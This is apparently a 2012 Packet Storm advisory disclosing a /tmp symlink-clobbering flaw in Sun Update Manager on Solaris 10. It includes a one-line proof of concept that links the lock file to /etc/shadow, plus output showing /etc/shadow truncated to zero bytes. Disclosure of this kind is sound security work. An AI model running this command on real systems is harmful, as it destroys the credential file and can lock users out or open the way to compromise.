Sun Update Manager /tmp Clobber

2012-07-20T00:00:00
ID PACKETSTORM:114908
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2012-07-20T00:00:00

Description

                                        
                                            `(author http://packetstormsecurity.org/user/lcashdol/)  
  
  
Noticed this during routine patching.  
  
/tmp file clobbering vulnerability in Sun Update manager.  
7/15/2012  
  
noticed this while patching my lab solaris system tonight.  
  
larry@s0l4r1s:/tmp$ ln -s /etc/shadow com.sun.swup.client.LOCK  
  
updatemanager is run  
  
larry@n1caragua:/tmp$ ls -l /etc/shadow  
-r-------- 1 root sys 0 Jul 19 18:49 /etc/shadow  
  
SunOS s0l4r1s 5.10 Generic_147441-19 i86pc i386 i86pc  
larry@n1caragua:~$   
  
truss output:  
  
4841/2: stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0  
4841/2: open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5  
  
  
`